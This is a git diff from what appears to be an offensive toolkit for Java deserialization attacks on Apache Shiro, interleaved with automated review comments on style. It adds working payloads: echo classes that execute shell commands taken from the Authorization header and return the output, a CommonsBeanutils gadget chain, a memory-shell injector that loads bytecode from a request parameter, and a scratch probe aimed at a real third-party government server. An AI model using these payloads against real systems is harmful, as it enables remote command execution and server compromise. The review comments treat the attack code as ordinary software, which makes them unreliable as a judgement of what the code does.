diff --git a/pom.xml b/pom.xml
index 8269d78..6b344cb 100644
--- a/pom.xml
+++ b/pom.xml
@@ -236,7 +236,7 @@ org.apache.logging.log4j log4j-api - 2.13.3 + 2.14.1 com.arronlong
@@ -300,7 +300,11 @@ hutool-all 5.7.13 - + + javassist + javassist + 3.12.0.GA +
diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java
index f7f2e80..265d54a 100644
--- a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java
+++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java
@@ -77,6 +77,7 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
 " if (var3 != null && !var3.isEmpty()) {\n" +
 " var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
 " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
+// " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Setcoolie\"), var3});\n" +
 " var4 = true;\n" +
 " }\n" +
 "\n" +
diff --git a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
new file mode 100644
index 0000000..19a63c1
--- /dev/null
+++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
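Review bot: The `javassist` dependency added in the second hunk is pinned to `3.12.0.GA`, a release that to my recollection predates support for the class-file versions current JDKs emit, while the Javassist-driven classes added elsewhere in this commit are compiled and run on a modern JDK; a current release (published under the `org.javassist` group id) would be the safer pin. The first hunk bumps `log4j-api` only as far as 2.14.1, the last line before the JNDI-lookup fixes; whether `log4j-core` is declared in this pom is not visible in the hunk, but if it is, both artifacts should move together to a patched 2.x release.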
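Review bot: The only change in this hunk is a commented-out copy of the `addHeader` line (with the header name misspelled `Setcoolie`) inside the generated-source string; commented-out code should not be committed, so drop the line and let version control keep the history. genPayload's body continues outside the hunk.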
@@ -0,0 +1,128 @@ +package com.summersec.attack.deser.echo; + +import javassist.*; + +import java.io.IOException; + +/** + * @ClassName: TomcatEcho2 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 11:33 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho2 implements EchoPayload{ + @Override + public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException { + final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime()); + if (clazz.getDeclaredConstructors().length != 0) { + clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); + } + + + + clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" + + " byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" + + " Object var2;\n" + + " Class var3;\n" + + " try {\n" + + " var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" + + " var2 = var3.newInstance();\n" + + " var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" + + " var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + + " } catch (Exception var5) {\n" + + " var3 = Class.forName(\"java.nio.ByteBuffer\");\n" + + " var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" + + " var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + + " } \n" + + " }",clazz)); + + clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" + + " java.lang.reflect.Field var2 = null;\n" + + " Class var3 = var0.getClass();\n" + + "\n" + + " while(var3 != Object.class) {\n" + + " try {\n" + + " var2 = var3.getDeclaredField(var1);\n" + + " break;\n" + + " } catch (NoSuchFieldException var5) 
{\n" + + " var3 = var3.getSuperclass();\n" + + " }\n" + + " }\n" + + "\n" + + " if (var2 == null) {\n" + + " throw new NoSuchFieldException(var1);\n" + + " } else {\n" + + " var2.setAccessible(true);\n" + + " return var2.get(var0);\n" + + " }\n" + + " }", clazz)); + clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" + + " boolean var4 = false;\n" + + " Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" + + " for (int var6 = 0; var6 < var5.length; ++var6) {\n" + + " Thread var7 = var5[var6];\n" + + " if (var7 != null) {\n" + + " String var3 = var7.getName();\n" + + " if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" + + " Object var1 = getFV(var7, \"target\");\n" + + " if (var1 instanceof Runnable) {\n" + + " try {\n" + + " var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" + + " } catch (Exception var13) {\n" + + " continue;\n" + + " }\n" + + " java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" + + "\n" + + " for(int var10 = 0; var10 < var9.size(); ++var10) {\n" + + " Object var11 = var9.get(var10);\n" + + " var1 = getFV(var11, \"req\");\n" + + " Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" + + " try {\n" + + "\n" + + "\n" + + " var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" + + " if (var3 != null && !var3.isEmpty()) {\n" + + " var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" + + " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" + + " var4 = true;\n" + + " }\n" + + "\n" + + " var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" + + " if (var3 != 
null && !var3.isEmpty()) {\n" + + " var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" + + " String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" + + " writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" + + " var4 = true;\n" + + " }\n" + + "\n" + + " if (var4) {\n" + + " break;\n" + + " }\n" + + " }catch (Exception var14) {\n" + + " writeBody(var2, var14.getMessage().getBytes());\n" + + " }\n" + + " }\n" + + "\n" + + " if (var4) {\n" + + " break;\n" + + " }\n" + + " }\n" + + " }\n" + + " }\n" + + " }\n" + + " }",clazz)); + + return clazz; + } + + + public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException { + ClassPool pool = ClassPool.getDefault(); +// TomcatEcho2 tomcatEcho2 = new TomcatEcho2(); + SpringEcho springEcho = new SpringEcho(); + springEcho.genPayload(pool); +// tomcatEcho2.genPayload(pool); + } +} diff --git a/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java new file mode 100644 index 0000000..5072924 --- /dev/null +++ b/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java 
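Review bot: The `main` at the end of the new file is leftover scratch: it instantiates `SpringEcho` (presumably the same-package implementation, since nothing is imported) and leaves the `TomcatEcho2` lines commented out, so it neither exercises this class nor belongs in a payload template; remove it. The class-level Javadoc is the unfilled IDE template (`@Description: TODO`, `@Description:` twice) — the same template header is pasted into JavassistClassLoader.java, SpringEcho.java, TomcatEcho.java and TomcatEcho2.java under src/test/java, http.java, qwe.java and qweasd.java in this commit; replace each with a one-sentence summary or delete the block. For this class something like `/** EchoPayload implementation that assembles a Tomcat echo class with Javassist; genPayload creates a fresh CtClass on every call. */` would do.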
@@ -0,0 +1,57 @@
+package com.summersec.attack.deser.payloads;
+
+import com.summersec.attack.deser.payloads.annotation.Authors;
+import com.summersec.attack.deser.payloads.annotation.Dependencies;
+import com.summersec.attack.deser.util.JavassistClassLoader;
+import com.summersec.attack.deser.util.Reflections;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+import com.summersec.attack.deser.util.StandardExecutorClassLoader;
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+
+
+@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"})
+@Authors({"phith0n"})
+public class CommonsBeanutilsString_192s implements ObjectPayload> {
+ @Override
+ public Queue getObject(Object template) throws Exception {
+
+ ClassPool pool = ClassPool.getDefault();
+ pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
+ final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
+
+ try {
+ CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID");
+ beanComparator.removeField(ctSUID);
+ }catch (javassist.NotFoundException e){}
+ beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator));
+ // mock method name until armed
+ final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance();
+ beanComparator.defrost();
+
+ PriorityQueue queue = new PriorityQueue(2, (Comparator)comparator);
+
+ queue.add("1");
+ queue.add("1");
+
+ Reflections.setFieldValue(queue, "queue", new Object[] { template, template });
+
+ Reflections.setFieldValue(beanComparator, "property", "outputProperties");
+
+ return (Queue)queue;
+ }
+
+ public static void main(String[] args) throws Exception {
+ CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s();
+
commonsBeanutilsString192.getObject(new Object());
+
+ }
+}
+
+
+
diff --git a/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java b/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java
index 2b9ec3e..406298b 100644
--- a/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java
+++ b/src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java
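Review bot: `catch (javassist.NotFoundException e){}` around the `serialVersionUID` removal is an empty catch; if a missing field is expected there, make that explicit with `} catch (javassist.NotFoundException ignored) { // no declared SUID to remove }`. The file imports `StandardExecutorClassLoader` but never uses it, and `getObject` works with raw `PriorityQueue`, `Comparator` and `Queue` plus casts where parameterized types (`PriorityQueue<Object>`, `Queue<Object>`) would remove most of the casts. The trailing `main` that calls `getObject(new Object())` and discards the result is scratch code and should not ship in the payloads package.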
@@ -17,7 +17,7 @@ public CtClass genPayload(ClassPool pool) throws Exception { } clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz)); - clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) 
defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz)); + clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String user = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n user = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"user\")});\n\n if (user != null && !user.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(user);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", 
clazz)); return clazz; }
diff --git a/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java b/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
new file mode 100644
index 0000000..2c901c3
--- /dev/null
+++ b/src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
@@ -0,0 +1,15 @@
+package com.summersec.attack.deser.util;
+
+/**
+ * @ClassName: JavassistClassLoader
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2022/1/24 16:34
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class JavassistClassLoader extends ClassLoader {
+ public JavassistClassLoader(){
+ super(Thread.currentThread().getContextClassLoader());
+ }
+}
\ No newline at end of file
diff --git a/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java b/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java
index 9b2ccfa..ce67781 100644
--- a/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java
+++ b/src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java
@@ -39,10 +39,11 @@ private void loadResource(String version) {
 // 加载对应版本目录下的 Jar 包
 tryLoadJarInDir(jarPath);
 // 加载对应版本目录下的 lib 目录下的 Jar 包
- tryLoadJarInDir(jarPath + File.separator + "lib");
+// tryLoadJarInDir(jarPath + File.separator + "lib");
 }
 private void tryLoadJarInDir(String dirPath) {
+ System.out.println("Try load jar in dir: " + dirPath);
 File dir = new File(dirPath);
 // 自动加载目录下的jar包
 if (dir.exists() && dir.isDirectory()) {
diff --git a/src/main/resources/allatori.xml b/src/main/resources/allatori.xml
new file mode 100644
index 0000000..f3948cd
--- /dev/null
+++ b/src/main/resources/allatori.xml
@@ -0,0 +1,34 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/src/test/java/SpringEcho.java b/src/test/java/SpringEcho.java
new file mode 100644
index 0000000..c4beaaa
--- /dev/null
+++ b/src/test/java/SpringEcho.java
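Review bot: The file ends without a trailing newline (`\ No newline at end of file`), which most formatters and linters flag; add one. Its Javadoc is the unfilled template, and the only thing the class does is pass the current thread's context class loader to `super`, so a single line such as `/** ClassLoader parented to the current thread's context class loader; used as the target of CtClass.toClass in the payloads package. */` would document it fully.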
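Review bot: The `lib` sub-directory lookup is disabled by commenting out the call rather than deleting it, and the new `System.out.println` in `tryLoadJarInDir` is a debug print left in library code. Delete the commented line (history is in version control) and either drop the print or route the message through the project's logging at debug level (the pom declares `log4j-api`) instead of stdout. Both `loadResource` and `tryLoadJarInDir` continue outside the hunk.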
@@ -0,0 +1,35 @@
+/**
+ * @ClassName: SpringEcho
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2022/1/19 13:37
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class SpringEcho {
+ public SpringEcho() throws Exception {
+ try {
+ org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
+ javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
+ javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
+
+ String te = httprequest.getHeader("Host");
+ httpresponse.addHeader("Host", te);
+ String tc = httprequest.getHeader("Authorization");
+ if (tc != null && !tc.isEmpty()) {
+ String p = org.apache.shiro.codec.Base64.decodeToString(tc.replaceAll("Basic ", ""));
+ String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p};
+ byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
+ String base64Str = "";
+ base64Str = org.apache.shiro.codec.Base64.encodeToString(result);
+ httpresponse.getWriter().write("$$$" + base64Str + "$$$");
+
+ }
+ httpresponse.getWriter().flush();
+ httpresponse.getWriter().close();
+ } catch (Exception e) {
+ e.getStackTrace();
+ }
+ }
+
+}
diff --git a/src/test/java/TomcatEcho.java b/src/test/java/TomcatEcho.java
new file mode 100644
index 0000000..364b65a
--- /dev/null
+++ b/src/test/java/TomcatEcho.java
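Review bot: `catch (Exception e) { e.getStackTrace(); }` at the end of the constructor only reads the stack trace and discards it, so it is an empty catch in disguise; if the swallow is deliberate, say so: `} catch (Exception ignored) { // best effort: never propagate }`. `String base64Str = "";` is overwritten on the next line and can be collapsed to `String base64Str = org.apache.shiro.codec.Base64.encodeToString(result);`. The class sits under src/test/java in the default package yet contains no test, so a comment saying why it is kept there, or moving it out of the test source set, would help the next reader.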
@@ -0,0 +1,101 @@ +/** + * @ClassName: tomcat1 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 13:20 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho { + public TomcatEcho() throws Exception { + boolean var4 = false; + Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads"); + for (int var6 = 0; var6 < var5.length; ++var6) { + Thread var7 = var5[var6]; + if (var7 != null) { + String var3 = var7.getName(); + if (!var3.contains("exec") && var3.contains("http")) { + Object var1 = getFV(var7, "target"); + if (var1 instanceof Runnable) { + try { + var1 = getFV(getFV(getFV(var1, "this$0"), "handler"), "global"); + } catch (Exception var13) { + continue; + } + java.util.List var9 = (java.util.List) getFV(var1, "processors"); + + for(int var10 = 0; var10 < var9.size(); ++var10) { + Object var11 = var9.get(var10); + var1 = getFV(var11, "req"); + Object var2 = var1.getClass().getMethod("getResponse",new Class[0]).invoke(var1, new Object[0]); + try { + + + var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Host")}); + if (var3 != null && !var3.isEmpty()) { + var2.getClass().getMethod("setStatus", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)}); + var2.getClass().getMethod("addHeader", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String("Host"), var3}); + var4 = true; + } + + var3 = (String)var1.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(var1, new Object[]{new String("Authorization")}); + if (var3 != null && !var3.isEmpty()) { + var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll("Basic ", "")); + String[] var12 = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", var3} : new String[]{"/bin/sh", "-c", var3}; + writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter("\\A").next().getBytes()); + var4 = true; + } + + if (var4) { + break; + } + }catch (Exception var14) { + writeBody(var2, var14.getMessage().getBytes()); + } + } + + if (var4) { + break; + } + } + } + } + } + } + private static Object getFV(Object var0, String var1) throws Exception { + java.lang.reflect.Field var2 = null; + Class var3 = var0.getClass(); + + while(var3 != Object.class) { + try { + var2 = var3.getDeclaredField(var1); + break; + } catch (NoSuchFieldException var5) { + var3 = var3.getSuperclass(); + } + } + + if (var2 == null) { + throw new NoSuchFieldException(var1); + } else { + var2.setAccessible(true); + return var2.get(var0); + } + } + private static void writeBody(Object var0, byte[] var1) throws Exception { + byte[] bs = ("$$$" + org.apache.shiro.codec.Base64.encodeToString(var1) + "$$$").getBytes(); + Object var2; + Class var3; + try { + var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); + var2 = var3.newInstance(); + var3.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)}); + var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2}); + } catch (Exception var5) { + var3 = Class.forName("java.nio.ByteBuffer"); + var2 = var3.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(var3, new Object[]{bs}); + var0.getClass().getMethod("doWrite", new Class[]{var3}).invoke(var0, new Object[]{var2}); + } + + } +} diff --git a/src/test/java/TomcatEcho2.java b/src/test/java/TomcatEcho2.java new file mode 100644 index 0000000..d933f9b --- /dev/null +++ b/src/test/java/TomcatEcho2.java 
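Review bot: The Javadoc names the class `tomcat1` although the class is `TomcatEcho` (and src/test/java/TomcatEcho2.java says `tomcat2`), so the header is not just unfilled but wrong; correct or delete it. The file is the expanded form of the string template in `com.summersec.attack.deser.echo.TomcatEcho2.genPayload`, checked into the test source set in the default package with no test in it, so the two copies will silently diverge; a top-of-file comment stating why the copy exists, or removing it, would avoid that.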
@@ -0,0 +1,79 @@ + + +/** + * @ClassName: tomcat2 + * @Description: TODO + * @Author: Summer + * @Date: 2022/1/19 11:36 + * @Version: v1.0.0 + * @Description: + **/ +public class TomcatEcho2 { + public TomcatEcho2() throws Exception { + try { + javax.management.MBeanServer var2 = org.apache.tomcat.util.modeler.Registry.getRegistry(null, null).getMBeanServer(); + String var3 = var2.queryNames(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,name=*http*"), (javax.management.QueryExp)null).iterator().next().toString(); + java.util.regex.Matcher var4 = java.util.regex.Pattern.compile("Catalina:(type=.*),(name=.*)").matcher(var3); + if (var4.find()) { + var3 = var4.group(2) + "," + var4.group(1); + } + java.lang.reflect.Field var5 = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor"); + var5.setAccessible(true); + Object var6 = var5.get(var2); + var5 = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb"); + var5.setAccessible(true); + java.util.HashMap var7 = (java.util.HashMap)var5.get(var6); + var6 = ((java.util.HashMap)var7.get("Catalina")).get(var3); + var5 = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource"); + var5.setAccessible(true); + var6 = var5.get(var6); + var5 = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"); + var5.setAccessible(true); + java.util.ArrayList var8 = (java.util.ArrayList)var5.get(var6); + var5 = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"); + var5.setAccessible(true); + for(int var9 = 0; var9 < var8.size(); ++var9) { + org.apache.coyote.Request var10 = 
(org.apache.coyote.Request)var5.get(var8.get(var9)); + String var11 = var10.getHeader("Authorization"); + String s = var10.getHeader("Host"); + if (var11 != null) { + var11 = org.apache.shiro.codec.Base64.decodeToString(var11.replaceAll("Basic ", "")); + java.io.InputStream var12 = Runtime.getRuntime().exec(System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"cmd.exe", "/c", var11} : new String[]{"sh", "-c", var11}).getInputStream(); + java.util.Scanner var13 = (new java.util.Scanner(var12)).useDelimiter("\\a"); + String var14 = var13.hasNext() ? var13.next() : ""; + var10.getResponse().setStatus(200); + var10.getResponse().addHeader("Host", s); + var10.getResponse().addHeader("Set-Cookie", "$$$"+org.apache.shiro.codec.Base64.encodeToString(var14.getBytes())+"$$$"); + break; + } + } + } catch (Exception var25) { + } + javax.servlet.http.HttpServletRequest var16; + javax.servlet.http.HttpServletResponse var21 = ((org.springframework.web.context.request.ServletRequestAttributes) org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getResponse(); + var16 = ((org.springframework.web.context.request.ServletRequestAttributes) org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest(); + String var17 = var16.getHeader("Authorization"); + String s = var16.getHeader("Host"); + if (var17 != null) { + var17 = org.apache.shiro.codec.Base64.decodeToString(var17.replaceAll("Basic ", "")); + java.io.InputStream var18 = Runtime.getRuntime().exec(var17).getInputStream(); + java.util.Scanner var19 = (new java.util.Scanner(var18)).useDelimiter("\\a"); + String var20 = var19.hasNext() ? var19.next() : ""; + var21.setStatus(200); + var21.addHeader("Host", s); + var21.getWriter().println("$$$" +org.apache.shiro.codec.Base64.encodeToString( var20.getBytes()) + "$$$"); + }else { + var21.setStatus(200); + var21.addHeader("Host", s); + } + + + } + +} 
diff --git a/src/test/java/http.java b/src/test/java/http.java new file mode 100644 index 0000000..bcfeff3 --- /dev/null +++ b/src/test/java/http.java @@ -0,0 +1,27 @@ +import cn.hutool.http.HttpRequest; +import cn.hutool.http.HttpResponse; + +import java.util.List; + +/** + * @ClassName: http + * @Description: TODO + * @Author: Summer + * @Date: 2021/9/25 13:37 + * @Version: v1.0.0 + * @Description: + **/ +public class http { + public static void main(String[] args) { + String tar = "http://cms.changdu.gov.cn:8002/uas-center/a/cas"; + HttpResponse re = HttpRequest.get(tar) + .header("Cookie","rememberMe=1") + .execute(); + + List resp = re.headerList("Set-Cookie"); + + System.out.println(resp); + System.out.println(resp.toString()); + + } +} diff --git a/src/test/java/qwe.java b/src/test/java/qwe.java new file mode 100644 index 0000000..c6d1d27 --- /dev/null +++ b/src/test/java/qwe.java @@ -0,0 +1,31 @@ +import org.apache.shiro.codec.Base64; + +import javax.crypto.KeyGenerator; +import javax.crypto.SecretKey; +import java.security.NoSuchAlgorithmException; + +/** + * @ClassName: qwe + * @Description: TODO + * @Author: Summer + * @Date: 2021/10/19 13:51 + * @Version: v1.0.0 + * @Description: + **/ +public class qwe { + public static void main(String[] args) { +// KeyGenerator keygen = null; +// try { +// keygen = KeyGenerator.getInstance("AES"); +// } catch (NoSuchAlgorithmException e) { +// e.printStackTrace(); +// } +// SecretKey deskey = keygen.generateKey(); +//// System.out.println(Base64.encodeToString(deskey.getEncoded())); +// System.out.println(Base64.encodeToString(new byte[]{101, -88, 60, -121, -55, 13, -27, -8, -27, -32, 18, -11, 106, 7, 15, -11})); + + String s = "Basic YWxhZGRpbjpvcGVuc2VzYW1l"; + System.out.println(s.replaceAll("Basic", "")); + } + +} diff --git a/src/test/java/qweasd.java b/src/test/java/qweasd.java new file mode 100644 index 0000000..af8438a --- /dev/null +++ b/src/test/java/qweasd.java 
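Review bot: `tar` hard-codes a third-party host, so anyone running this `main` sends a request to a server the project does not own; a scratch test should target a placeholder or a local fixture, e.g. `String tar = System.getProperty("target.url", "http://localhost:8080/");`. `List resp` is a raw type — `List<String> resp = re.headerList("Set-Cookie");` matches hutool's return type — and the second `println(resp.toString())` prints exactly what the first already did.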
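Review bot: `Base64`, `KeyGenerator`, `SecretKey` and `NoSuchAlgorithmException` are imported but referenced only from the commented-out block in `main`, so the file carries four unused imports and a dead snippet. Delete the commented-out lines and the imports with them; `main` then needs only `String s` and the `println`.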
@@ -0,0 +1,20 @@
+import sun.misc.BASE64Encoder;
+
+/**
+ * @ClassName: qweasd
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/10/20 16:30
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class qweasd {
+ public static void main(String[] args) {
+ System.out.println(System.getProperty("usr.dir"));
+ sun.misc.BASE64Encoder base64Encoder = new BASE64Encoder();
+// base64Encoder.
+// base64Encoder.encodeBuffer("");
+// java.util.Base64.getEncoder().encode()
+
+ }
+}
